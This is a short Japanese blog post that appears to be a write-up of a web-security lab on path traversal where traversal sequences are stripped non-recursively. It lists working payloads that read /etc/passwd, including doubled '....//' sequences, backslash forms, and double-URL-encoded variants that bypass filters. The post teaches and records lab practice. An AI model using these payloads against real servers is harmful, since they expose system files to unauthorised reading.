shikata ga nai

Private? There is no such things.

File path traversal, traversal sequences stripped non-recursivelyをやってみた

Hello there, ('ω')ノ 

 

非再帰的にストリッピングされたトラバーサルシーケンスを。

 

f:id:ThisIsOne:20210227115205p:plain

 

下記のペイロードを入力してSendして。

 ....//....//....//etc/passwd

 

f:id:ThisIsOne:20210227115424p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210227115542p:plain

 

特殊文字は非再帰的にフィルタリングされるので二重に書き込むことができて。

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

 

また、非標準のエンコーディング(例:...%c0%af、..%252f) を使用して。

フィルタリングをバイパスできる場合もあって。

 

下記は、不要なURLデコードで削除されたトラバーサルシーケンスで。

 ..%252f..%252f..%252fetc/passwd

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain